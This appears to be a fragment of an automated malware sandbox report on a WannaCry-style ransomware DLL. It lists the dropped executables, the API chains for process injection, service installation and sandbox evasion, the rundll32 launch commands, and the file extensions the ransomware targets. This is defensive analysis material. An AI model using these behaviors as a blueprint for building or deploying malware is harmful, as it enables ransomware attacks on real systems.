              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93CF04_2_00B93CF0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B928C84_2_00B928C8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93CC24_2_00B93CC2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93C3D4_2_00B93C3D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93D364_2_00B93D36
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93D1F4_2_00B93D1F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93D4B4_2_00B93D4B
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CF04_2_7FEA3CF0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA28C84_2_7FEA28C8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3CC24_2_7FEA3CC2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA4C9E4_2_7FEA4C9E
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D4B4_2_7FEA3D4B
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3C3D4_2_7FEA3C3D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D364_2_7FEA3D36
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3D1F4_2_7FEA3D1F
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83CF011_2_00A83CF0
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A828C811_2_00A828C8
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83CC211_2_00A83CC2
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83C3D11_2_00A83C3D
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83D3611_2_00A83D36
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83D1F11_2_00A83D1F
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83D4B11_2_00A83D4B
              Source: C:\Windows\tasksche.exeCode function: 29_2_00406C4029_2_00406C40
              Source: C:\Windows\tasksche.exeCode function: 29_2_00402A7629_2_00402A76
              Source: C:\Windows\tasksche.exeCode function: 29_2_00402E7E29_2_00402E7E
              Source: C:\Windows\tasksche.exeCode function: 29_2_0040350F29_2_0040350F
              Source: C:\Windows\tasksche.exeCode function: 29_2_00404C1929_2_00404C19
              Source: C:\Windows\tasksche.exeCode function: 29_2_0040541F29_2_0040541F
              Source: C:\Windows\tasksche.exeCode function: 29_2_0040379729_2_00403797
              Source: C:\Windows\tasksche.exeCode function: 29_2_004043B729_2_004043B7
              Source: C:\Windows\tasksche.exeCode function: 29_2_004031BC29_2_004031BC
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B905F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B905F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D GetModuleHandleA,GetVersion,VirtualAlloc,FindCloseChangeNotification,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,4_2_00B9042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9252F NtOpenSection,4_2_00B9252F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B92574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_00B92574
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B92477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_00B92477
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00B9144A
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B924AE lstrcpyW,lstrlenW,NtCreateSection,4_2_00B924AE
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B933E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00B933E0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B91422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_00B91422
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_00B93405
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA33E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA33E0
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA05F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,4_2_7FEA05F2
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA24AE lstrcpyW,lstrlenW,NtCreateSection,4_2_7FEA24AE
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,4_2_7FEA2477
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA2574 NtMapViewOfSection,CloseHandle,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,4_2_7FEA2574
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA144A
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA252F NtOpenSection,4_2_7FEA252F
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,4_2_7FEA042D
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA1422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,4_2_7FEA1422
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA3405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,4_2_7FEA3405
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A805F2 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,11_2_00A805F2
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8252F NtOpenSection,11_2_00A8252F
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A82574 NtMapViewOfSection,FindCloseChangeNotification,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,11_2_00A82574
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A82477 NtCreateFile,NtCreateFile,NtCreateFile,NtProtectVirtualMemory,NtWriteVirtualMemory,11_2_00A82477
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8144A LookupPrivilegeValueA,NtAdjustPrivilegesToken,11_2_00A8144A
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A824AE lstrcpyW,lstrlenW,NtCreateSection,11_2_00A824AE
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A833E0 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,11_2_00A833E0
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8042D GetModuleHandleA,GetVersion,VirtualAlloc,CloseHandle,SetProcessAffinityMask,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,11_2_00A8042D
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A81422 LookupPrivilegeValueA,NtAdjustPrivilegesToken,11_2_00A81422
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A83405 NtOpenSection,NtQuerySystemInformation,MapViewOfFile,CloseHandle,UnmapViewOfFile,11_2_00A83405
              Source: mssecsvc.exe.2.drStatic PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
              Source: tasksche.exe.6.drStatic PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
              Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
              Source: FjYNZSPNkt.dllVirustotal: Detection: 86%
              Source: FjYNZSPNkt.dllMetadefender: Detection: 78%
              Source: FjYNZSPNkt.dllReversingLabs: Detection: 96%
              Source: FjYNZSPNkt.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll"
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe
              Source: unknownProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exe -m security
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGameJump to behavior
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGameJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1Jump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\mssecsvc.exe C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /iJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\mssecsvc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
              Source: classification engineClassification label: mal100.rans.troj.evad.winDLL@30/53@2/3
              Source: C:\Windows\mssecsvc.exeCode function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\tasksche.exeCode function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,29_2_00401CE8
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,4_2_00408090
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B905F2 FindCloseChangeNotification,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,FindCloseChangeNotification,FindCloseChangeNotification,4_2_00B905F2
              Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,CloseHandle,CreateProcessA,CloseHandle,CloseHandle,4_2_00407CE0
              Source: mssecsvc.exe, 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, mssecsvc.exe, 0000000B.00000002.384640585.0000000000710000.00000080.00000001.01000000.00000004.sdmp, tasksche.exe, 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-StarterEdition-wrapper~3
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a04160\avg-secure-search-installer.exe
              Source: mssecsvc.exeString found in binary or memory: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-2-Pa
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Server-Help-Package.ClientUltimate~31bf385
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-IIS-WebServer-AddOn-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Pack
              Source: mssecsvc.exeString found in binary or memory: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-Customization-Packa
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\mssecsvc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: FjYNZSPNkt.dllStatic file information: File size 5267459 > 1048576
              Source: FjYNZSPNkt.dllStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x501000
              Source: C:\Windows\tasksche.exeCode function: 29_2_00407710 push eax; ret 29_2_0040773E
              Source: C:\Windows\tasksche.exeCode function: 29_2_004076C8 push eax; ret 29_2_004076E6
              Source: mssecsvc.exe.2.drStatic PE information: section name: hzuevao
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B93D36 LoadLibraryA,GetProcAddress,LoadLibraryA,GetTickCount,GetVolumeInformationA,GetModuleFileNameA,wsprintfA,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateEventA,socket,connect,GetVersionExA,wsprintfA,CreateThread,CloseHandle,GetTickCount,4_2_00B93D36

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\mssecsvc.exeExecutable created and started: C:\WINDOWS\tasksche.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeExecutable created and started: C:\WINDOWS\mssecsvc.exeJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\mssecsvc.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeFile created: C:\Windows\tasksche.exeJump to dropped file
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,4_2_00407C40
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\mssecsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may execute only at specific dates)
              Source: C:\Windows\mssecsvc.exeEvasive API call chain: GetSystemTime,DecisionNodes,Sleepgraph_11-2539
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Windows\mssecsvc.exeSpecial instruction interceptor: First address: 0000000000A718B2 instructions caused by: Self-modifying code
              Source: C:\Windows\mssecsvc.exeSpecial instruction interceptor: First address: 0000000000A6B1E4 instructions caused by: Self-modifying code
              Contains functionality to detect sleep reduction / modifications
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B941784_2_00B94178
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_7FEA41784_2_7FEA4178
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8417811_2_00A84178
              Source: C:\Windows\System32\svchost.exe TID: 480Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 468Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\mssecsvc.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_11-2539
              Source: C:\Windows\mssecsvc.exeCode function: 4_2_00B9042D rdtsc 4_2_00B9042D
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\mssecsvc.exeAPI coverage: 10.0 %
              Source: C:\Windows\mssecsvc.exeCode function: 11_2_00A8417811_2_00A84178
              Source: C:\Windows\mssecsvc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
              Source: svchost.exe, 00000021.00000000.397661101.00000247D3000000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@vmicvss
              Source: backgroundTaskHost.exe, 00000024.00000000.543434763.000001D426613000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6post:https://arc.msn.com/v3/Delivery/Events/Impression=&PID=425106554&TID=700342084&CID=128000000001392709&BID=1423522069&PG=PC000P0FR5.0000000IQ8&TPID=425106554&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ASID={ASID}&TIME={DATETIME}&SLOT=1&REQT=20220720T155055&MA_Score=2&LOCALID=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&DS_EVTID=dd1a8e84fd1343a98117c17a02a03b24&BCNT=1&PG=PC000P0FR5.0000000IQ8&UNID=314559&MAP_TID=F45BD19D-6B8E-42A3-8BE3-7AB3D0A2D2E6&NCT=1&PN=DA63DF93-3DBC-42AE-A505-B34988683AC7&ASID=BEEDE8C6B3A34585A9CD2D88614A35DA&REQASID=BEEDE8C6B3A34585A9CD2D88614A35DA&ARC=1&EMS=1&LOCALE=EN-US&COUNTRY=US&HTD=-1&LANG=1033&DEVLANG=EN&CIP=84.17.52.2&OPTOUTSTATE=256&HTTPS=1&PRODID=00000000-0000-0000-0000-000000000000&DVTP=2&DEVOSVER=10.0.17134.1&DEVOSMAJ=10&DEVOSMIN=0&DEVOSBLD=17134&DEVOSMINBLD=1&LOD=1118&LOH=24&LO=1611218&RAFB=0&MARKETBASEDCOUNTRY=US&CLR=CDM&CFMT=TEXT%2CIMAGE&SFT=JPEG%2CPNG%2CGIF%2CJPG&H=1&W=1&TP=1&FESVER=1.3&CACHE_CHS=0&CACHE_IMP=0&CACHE_CHF=0&CACHE_DS=50583&CACHE_FS=32089&CACHE_SC=6&WPX=1&HPX=1&TIME=20220720T155045Z&PL=EN-US&CTMODE=MULTISESSION&ARCH=X64&CDMVER=10.0.17134.1&DEVFAM=WINDOWS.DESKTOP&DEVFORM=UNKNOWN&DISPHORZRES=1280&DISPSIZE=17.1&DISPVERTRES=1024&ISU=0&METERED=FALSE&NETTYPE=ETHERNET&NPID=SC-314559&OEMNAME=VMWARE%2C%2